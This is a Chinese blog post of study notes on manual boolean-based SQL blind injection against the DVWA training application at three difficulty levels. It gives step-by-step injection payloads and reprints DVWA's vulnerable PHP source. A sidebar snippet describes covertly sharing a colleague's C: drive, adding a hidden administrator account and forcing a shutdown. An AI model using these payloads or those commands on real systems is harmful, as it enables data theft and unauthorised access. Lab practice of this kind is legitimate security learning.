DVWA sql盲注手工

最新推荐文章于 2024-04-08 21:42:32 发布
最新推荐文章于 2024-04-08 21:42:32 发布
阅读量385 收藏 2
点赞数
分类专栏: Hacker Way 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45650712/article/details/107775374
版权

学习笔记—DVWA sql盲注手工

一、dvwa 低sql盲注手工
在这里插入图片描述
在这里插入图片描述
1’and ascii(substr(database(),2,1))>'97 exists
1’and ascii(substr(database(),2,1))<'122 exists
1’and ascii(substr(database(),2,1))<'119 exists
1’and ascii(substr(database(),2,1))<'118 MISSING
1’and ascii(substr(database(),2,1))='118 exists
先判断字符类型,再判断具体字母

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1’and ascii(substr(database(),2,1))=‘118&Submit=Submit#
在这里插入图片描述
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1 and (select count(table_name) from information_schema.tables where table_schema=database())=2&Submit=Submit#
在这里插入图片描述
先猜测长度,在用跟猜测数据库名一样的方法猜表名
1’ and length(substr((select table_name from information_schema.tables where table_schema=‘dvwa’ limit 0,1),1))=1 # MISSING
在这里插入图片描述

1’ and length(substr((select table_name from information_schema.tables where table_schema=‘dvwa’ limit 0,1),1))=9 # exists
得到表名长度为9
之后还是先猜字符类型,再猜具体字符
1’ and ascii(substr ((select table_name from imformation_schema.tables where table_schema=‘dvwa’ limit 0,1),1))>97
在这里插入图片描述
二、dvwa 中sql盲注手工

<?php 

if( isset( $_POST[ 'Submit' ]  ) ) { 
    // Get input 
    $id = $_POST[ 'id' ]; 
    $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); 

    // Check database 
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors 

    // Get results 
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors 
    if( $num > 0 ) { 
        // Feedback for end user 
        echo '<pre>User ID exists in the database.</pre>'; 
    } 
    else { 
        // Feedback for end user 
        echo '<pre>User ID is MISSING from the database.</pre>'; 
    } 

    //mysql_close(); 
} 

?>

在这里插入图片描述
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/
?id=1 and ascill(substr((select user from users limit 0,1),4,1))=110%23
&Submit=Submit#
在这里插入图片描述
三、dvwa 高sql盲注手工

<?php 

if( isset( $_COOKIE[ 'id' ] ) ) { 
    // Get input 
    $id = $_COOKIE[ 'id' ]; 

    // Check database 
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors 

    // Get results 
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors 
    if( $num > 0 ) { 
        // Feedback for end user 
        echo '<pre>User ID exists in the database.</pre>'; 
    } 
    else { 
        // Might sleep a random amount 
        if( rand( 0, 5 ) == 3 ) { 
            sleep( rand( 2, 4 ) ); 
        } 

        // User wasn't found, so the page wasn't! 
        header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); 

        // Feedback for end user 
        echo '<pre>User ID is MISSING from the database.</pre>'; 
    } 

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); 
} 

?>

在这里插入图片描述
在这里插入图片描述
了解更多请关注下列公众号:
在这里插入图片描述

永不垂头
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DVWA-SQL盲注
HoYim
03-05 527
基于布尔的盲注 判断是否存在注入,注入是字符型还是数字型 输入1’and ‘1’=‘1,判断条件正确 输入1’ and ‘1’=‘2,判断条件错误 由此判断存在字符型注入 2.猜解当前数据库名 猜数据库名的长度 输入1’ and length(database())=4# 确定长度为4 然后猜数据库名字,可用二分法节省时间 输入1’ and ascii(substr(databse(),0...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
DVWA】21. SQL Injection (Blind)SQL注入盲注(Low手工版)
最新发布
Zichel77的博客
04-08 979
ascii():这是将字符转换为ASCII码的函数。因此,ascii(substr(database(),1,1))返回数据库名称的第二个字符的ASCII码。ascii(substr(database(),1,1)):这部分是一个SQL查询。substr():这是截取字符串的函数。database():这是一个MySQL内置函数,用于获取当前数据库的名称。=100:这是一个比较操作,检查第二个字符的ASCII码是否等于100。1 和 1 是用于指定截取字符串的起始位置和长度的参数。然后进行数据库名猜解。
DVWA——SQL盲注(全等级)
@一只躺平的猪@的博客
07-13 5553
SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错注入,本章主要介绍布尔盲注。布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行时间型则是根据页面加载时间是否变化来判断的。SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
dvwa-sql盲注
AI_SumSky的博客
11-27 4661
sql盲注 low级别 先提交个参数,发现执行成功就是回显时只是说这个id存在数据库,没有回显出id具体信息,怪不得叫盲注。 分析源码没有对所提交参数id做任何处理就直接执行了,只是回显的时候被隐藏了。 其实也可以通过ascaii码来一个一个字符弄出来,输入1’ and length(database())=1#,显示User ID is MISSING from the database. 输入1’ and length(database())=2#,显示User ID is MISSING from
DVWA盲注详解
qq_45788625的博客
04-18 6581
low等级DVWA盲注详解
DVWA SQL Injection(blind)(SQL盲注)全等级
柠檬i的博客
12-19 2613
SQL Injection(blind)(盲注) 目录:SQL Injection(blind)(盲注)1. Low2.Medium3.High4.Impossible5.运用sqlmap自动化注入 1. Low 手工注入方法 服务端只会返回不会显示搜索值,此类无回显的SQL注入称作SQL盲注。 本题只会返回用户存在与否,即真假,此类盲注成为布尔(bool)盲注。 注入思路是猜解库表字段和数据的长度,每个猜完长度之后猜解每一位字符的ascii值,然后拼接之后形成字符。 1' and length(datab
DVWASQL Injection Blind(SQL盲注
RexHa的博客
10-04 2295
DVWA sql盲注
SQL注入——利用sqlmap工具对DVWA进行盲注
weixin_56438805的博客
03-23 2252
因为手工注入略显麻烦,所以在此尝试用sqlmap工具注入。 查看了帮助命令 一.SQL Injection的Low等级 此为get型、id注入点为布尔型盲注,并扫出了版本号 共有9个数据库 查看数据库DVWA的表 共2个表 查看users表中的字段 共8个字段 查看用户名和密码 让整表输出 二.SQL Injection的medium等级 post型,需加–data 在此我输入的ID=5 编辑重发ID=5 or 1=1 发送后,可显示如下图 查看为post型,id注入点为布尔型盲注,并扫出
DVWASQL注入(盲注
天空之蓝的博客
11-17 2785
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
SQL盲注medium.pdf
05-13
本文档主要讲解SQL盲注的技术,使用DVWA Security平台进行演示,难度设置为medium。下面我们将对每一步操作进行详细的解释和知识点总结。 一、DVWA Security平台的使用 DVWA Security是一个开源的Web应用安全测试...
网络安全原理与应用:SQL盲注.pptx
05-16
【网络安全原理与应用:SQL盲注SQL盲注是一种针对Web应用程序的安全漏洞利用技术,它主要发生在应用程序未能正确过滤或转义用户输入的SQL查询时。与传统的SQL注入不同,盲注并不直接显示注入语句的执行结果,...
2020-12-06-DVWAsql.md
01-24
### DVWASQL Injection知识点详解 #### 一、SQL Injection概念 SQL Injection(SQL注入)是一种常见的Web应用程序安全漏洞,攻击者通过将恶意SQL代码插入应用程序的输入字段中,从而改变原有SQL语句的逻辑,进而...
简单入侵操作
永不垂头的博客
06-30 9703
学习笔记—简单入侵操作 趁别人不在的时间操作他人电脑 打开cmd 输入:net share c$=c:\(将他的磁盘共享出去,同时也要打开电脑上的允许远程操控权限) 然后ipconfig下,记录他的ip 写好.bat脚本。 net user admin 123456 /add net localgroup administrators admin /add shutdown -s -t 60 -c “这个年纪你睡得着觉?” 从本机cmd上输入net use k: \192.168.1.103\c$
解决kali不显示网卡
永不垂头的博客
07-10 7669
学习笔记—解决kali不显示网卡 状况图 首先在本机检查vm服务是否开启 服务开启后进入vi /etc/network/interfaces 编辑,添加 auto eth0 iface eth0 inet dhcp wq保存退出 /etc/init.d/networking restart 重启网卡恢复正常 了解更多请关注下列公众号: 了解更多请关注下列公众号: ...
资产收集的方法总结
永不垂头的博客
02-01 6059
资产收集的方法总结 文章目录资产收集的方法总结前言一、资产收集基本名词概念二、相关收集方法1.fofa2.google搜索语法3.logo4.favicon.ico5.关键字6.维基百科7.天眼查,企查查8. 微信公众号9. APP10.在线接口查询三、我的公众号 前言 很多人以为资产收集就是信息收集,刚开始我也是这样认为的,其实信息收集包含资产收集但不限于资产收集,信息收集包含whois,真实IP,网站架构,子域名收集,敏感目录,DNS信息,旁站,C段,端口等;而资产收集主要收集IP和域名,找到属于目标的
Dvwa csrf之low、medium、high级别漏洞实战
永不垂头的博客
08-11 5073
Dvwa csrf低中高级别漏洞实战 Low 源代码如下: GLOBALS:引用全局作用域中可用的全部变量。GLOBALS :引用全局作用域中可用的全部变量。GLOBALS:引用全局作用域中可用的全部变量。GLOBALS 这种全局变量用于在 PHP 脚本中的任意位置访问全局变量(从函数或方法中均可)。PHP 在名为 $GLOBALS[index] 的数组中存储了所有全局变量。变量的名字就是数组的键。 从源代码可以看出这里只是对用户输入的两个密码进行判断,看是否相等。不相等就提示密码不匹配。 相等的话,查看
dvwa sql盲注高级
08-11
DVWA 中,你可以通过以下步骤进行 SQL 盲注的高级练习: 1. 登录 DVWA:在浏览器中访问 DVWA,并使用提供的用户名和密码登录。 2. 寻找 SQL 注入点:在 DVWA 中,你需要找到存在 SQL 注入漏洞的输入点。这可以...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值